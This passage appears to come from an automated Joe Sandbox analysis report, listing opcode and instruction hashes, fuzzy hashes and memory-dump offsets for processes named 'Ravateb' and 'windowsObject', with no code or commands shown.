          • Instruction Fuzzy Hash: 5721382190D7AA0FE729526868152B53FD0DF466A1F0842FFDD89C71D3ED095C0693A6
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2c748ebacd9c817b3ad4f921418df52bb3ffda5b0e7904edaae9e6b108efec3b
          • Instruction ID: 343ef9aa80e90e94aae59b57164e84b40576b87a22c01bb88f65d4aa141cd1ba
          • Opcode Fuzzy Hash: 2c748ebacd9c817b3ad4f921418df52bb3ffda5b0e7904edaae9e6b108efec3b
          • Instruction Fuzzy Hash: 09217826A0D76E0BE32D129CA8052B17BD0DF866A1F0842FBDC48C71D3ED199C42D3A1
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5f3157a50ba4cd3d1b5f7c8927fd80ceed59437132d38fe52fe849658af1c8c5
          • Instruction ID: 223bf74e1341731461e07db4bf7cfbc52a3ac05145d75116889138ae9fd6948e
          • Opcode Fuzzy Hash: 5f3157a50ba4cd3d1b5f7c8927fd80ceed59437132d38fe52fe849658af1c8c5
          • Instruction Fuzzy Hash: 3C31D471C0C6AE8BEB6A97548C521A87BF0FF14744F0400EAD04D971C2EE686985CB96
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 21dba65255bff1a6ebb136555851fe99088ad2773c0a41bd37fcf46220e52ed5
          • Instruction ID: 1306b39ad6b66a194436db026ee85b7603f734a8b40dfdaa220eda5eb4a698c7
          • Opcode Fuzzy Hash: 21dba65255bff1a6ebb136555851fe99088ad2773c0a41bd37fcf46220e52ed5
          • Instruction Fuzzy Hash: A1319E31C0DAAD4BEB69DB548C961A8BBE0EF14705F0400EEC04DA7192ED282988CB66
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8deebd3cca1f3326ff87191c17e819f9337d177a474ae44b4aa53cd7e3c340b2
          • Instruction ID: 20d31c6aa7bfc0d0f8b0fd59f18590728fe7f5ef2567a732f37f4d16cf483e73
          • Opcode Fuzzy Hash: 8deebd3cca1f3326ff87191c17e819f9337d177a474ae44b4aa53cd7e3c340b2
          • Instruction Fuzzy Hash: E1210520F0C95E4FEB99E76C981566537E1EFD5340B5885FAD00CC7286EE1CE842D3A1
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7982b8b49d3dff5d79244ea1a04b08d2777f23e5c599fd34d491471cad46adee
          • Instruction ID: 5972b058143d7aa2f4e6055585f30ae58d69839c8f84ffebb26945ed75f030c3
          • Opcode Fuzzy Hash: 7982b8b49d3dff5d79244ea1a04b08d2777f23e5c599fd34d491471cad46adee
          • Instruction Fuzzy Hash: 1521072680DA9E4FE71AA7B858516B57FA1EF92244F0941FAD04CC7183FE1C9914C7B1
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9da38e5fdc9708ff2e7dad13cba3aff9d349109803d3ff7c14b35facd54117b7
          • Instruction ID: 1dd6dba155a07b1b4b3046c09a13fdc7224ec69c1ab95e80ba3add7007cd5088
          • Opcode Fuzzy Hash: 9da38e5fdc9708ff2e7dad13cba3aff9d349109803d3ff7c14b35facd54117b7
          • Instruction Fuzzy Hash: 5711E321F0CD5F0FDB99D76C94146A537E2EFA529070985F9D04CC7186EE18E842C3A0
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9b58c7bffe1097c9a60686ce721c719283dfbbb44fdc23c9de1cf8bb04f8639a
          • Instruction ID: 3c784af7dea3a27ae5edd93583df2ee0c1041427798358a223b818444cb8c736
          • Opcode Fuzzy Hash: 9b58c7bffe1097c9a60686ce721c719283dfbbb44fdc23c9de1cf8bb04f8639a
          • Instruction Fuzzy Hash: 2C01F55270CA6E1FE218626D7C061FA3BC5EBCA276F04137BE5CEC31D3E904185392A4
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 02477b14adb0fdf71a8c939f83969c56b5e7e15a2ce010f93964e3bec2a49c7f
          • Instruction ID: 2673c5f40f22fb476377cba32a51efc655aed2cf4365f30659bece1af190a88c
          • Opcode Fuzzy Hash: 02477b14adb0fdf71a8c939f83969c56b5e7e15a2ce010f93964e3bec2a49c7f
          • Instruction Fuzzy Hash: DA11C621B1CE6E4BEA6DE68CA4410B973D1EFA4750B1441BFD44FC328BED28AC468295
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 85fbf2b10101d85010f054b9a5115fb5177a56eab9b2047bed980f61e19e0e56
          • Instruction ID: 53b54abf67e408ce90dde01c2d0cef448bee7c8674bc17933629f9862c420be2
          • Opcode Fuzzy Hash: 85fbf2b10101d85010f054b9a5115fb5177a56eab9b2047bed980f61e19e0e56
          • Instruction Fuzzy Hash: 8D01F911A0DA2E0BF66C504DB8553B637C1DB847B1F0542BFED4DC22C1FD199C45A2A1
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 89f8c0526ba0bd2209b6e2c727cb84774de6d78572c15831d1120dd077f5c5ae
          • Instruction ID: 6f6e66a99c4db26f48d0a65c911ba115939eb21ad7a7f7c4d430f877faa4c893
          • Opcode Fuzzy Hash: 89f8c0526ba0bd2209b6e2c727cb84774de6d78572c15831d1120dd077f5c5ae
          • Instruction Fuzzy Hash: B311BF0290DAAE0BEB15A3BC58651F93FA1DF42248B0942F3D088CB1D3FC18684A8276
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ff38b148dd0ff83b384cc786181ebc7baeadb3dd0166914183b7d66e77628c24
          • Instruction ID: 5f95c53d0cade459e180b6d568120c6d81bf9e13e2d88771e4bd55925662b07c
          • Opcode Fuzzy Hash: ff38b148dd0ff83b384cc786181ebc7baeadb3dd0166914183b7d66e77628c24
          • Instruction Fuzzy Hash: DFF0285170DA1D1F611C915D7C0A5BA7BC4E78A671F54136EF9CEC31D2ED04581391A8
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f2f65eefbefe6f4439af921d1b20d0930640e0c4875eae15836d34237da2dc79
          • Instruction ID: b42d449ad9c0695ea3a939433a016d861d8933763b37194961316890cca3108b
          • Opcode Fuzzy Hash: f2f65eefbefe6f4439af921d1b20d0930640e0c4875eae15836d34237da2dc79
          • Instruction Fuzzy Hash: 73018421B1CE7E0B956CA68CA4011BA73D1EF987A0B5446BFD44FC31CBED18AD4682E5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5e46597f550bbe9a8deb42044b6862c3e3ddea9afdd2272a9dfc3fc9ae445f77
          • Instruction ID: a5a308d42feb87b6a0bdc6a5a1d3d11ee7cfb1da6a5dbd94b9c9eed0de150bb7
          • Opcode Fuzzy Hash: 5e46597f550bbe9a8deb42044b6862c3e3ddea9afdd2272a9dfc3fc9ae445f77
          • Instruction Fuzzy Hash: BC01A721B1CE2E4AA56CA64CB4010B973C1EF5476071442BFD44FC318BED18AC4682E5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7cb32c93a3993f39cbef37b69ff65251150da367742f8754b5fe549e9448374b
          • Instruction ID: f5961dcc3078eac850154678255f5dad6a029971eccd1c2de64a6a301e70e124
          • Opcode Fuzzy Hash: 7cb32c93a3993f39cbef37b69ff65251150da367742f8754b5fe549e9448374b
          • Instruction Fuzzy Hash: 28018622B1CE2E4BD56CAA4CB4411B973D1EF6876075442BFD48FD328BED18AC4682D9
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d5cb3d3416e2c3f9fad1e48aaee82d33c5d43ce43be03b01b8aad3b4a3c28350
          • Instruction ID: 2e48f314dce6551bc3b2f87529320c9f973bc056a6e6a211bf7081f1633f6fa7
          • Opcode Fuzzy Hash: d5cb3d3416e2c3f9fad1e48aaee82d33c5d43ce43be03b01b8aad3b4a3c28350
          • Instruction Fuzzy Hash: A9F08622B1CE2E4AA56CA68CB4010B973C1EF94760B6442BFD44FC318AFD18AD4682E5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bf473bd4e0e96971a1305c25e6ab63a6085e1e7f676d4a773b79e3c9756f7315
          • Instruction ID: 7092f543eb0814fa8f4e7ef37708f4b35a7c3dea27e21da4622a6895af066068
          • Opcode Fuzzy Hash: bf473bd4e0e96971a1305c25e6ab63a6085e1e7f676d4a773b79e3c9756f7315
          • Instruction Fuzzy Hash: BCF04922B1CD2E4AD56CA68CB4411B673D1EF68760B1442BFD44FD318BED18AD4682D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4187b9f703dc214b2f4d30520f4eeb4856d37527b529161503c8984e1a8abf6e
          • Instruction ID: e95ce0c55ff3394b34fb42f8c15f1ecdd8a2ae69725922f804bf1fbfce3f728a
          • Opcode Fuzzy Hash: 4187b9f703dc214b2f4d30520f4eeb4856d37527b529161503c8984e1a8abf6e
          • Instruction Fuzzy Hash: 26F0A922B1CE6E4B966CA64CB40107673D1EF5476071446BFD44FC318BED18AD4682D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 95ebe163ac5e09f547fdb7b0266349a8fefc522905c8513215d811a8d701be6c
          • Instruction ID: 89eda10fd3af09447023296834b69831ab8ebf53a90322bb68b3d8b54e50ade3
          • Opcode Fuzzy Hash: 95ebe163ac5e09f547fdb7b0266349a8fefc522905c8513215d811a8d701be6c
          • Instruction Fuzzy Hash: 34018621B1CE6E4B956CA68CB0411B973D1EF54750B64417ED44FC328BFE18AD4682A9
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1967b1b2cdba180bccfd2bb947598febf1fce6b7bae4f2ca8365adc4a57727d2
          • Instruction ID: 5d0aa682bfd1aacf039bc7e16f5cd0ba61b62614fbde676ace994f933a21d540
          • Opcode Fuzzy Hash: 1967b1b2cdba180bccfd2bb947598febf1fce6b7bae4f2ca8365adc4a57727d2
          • Instruction Fuzzy Hash: 64F0A922B1CD6E4AD56CA64CB4411B973D1EF58760B1446BFD44FC318BED28AC4682D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd

          Executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          • Instruction Fuzzy Hash: C1F06D34A0855E8FEE98EF14C481AA93BA2FF94304B504170D51887396ED35FD11C760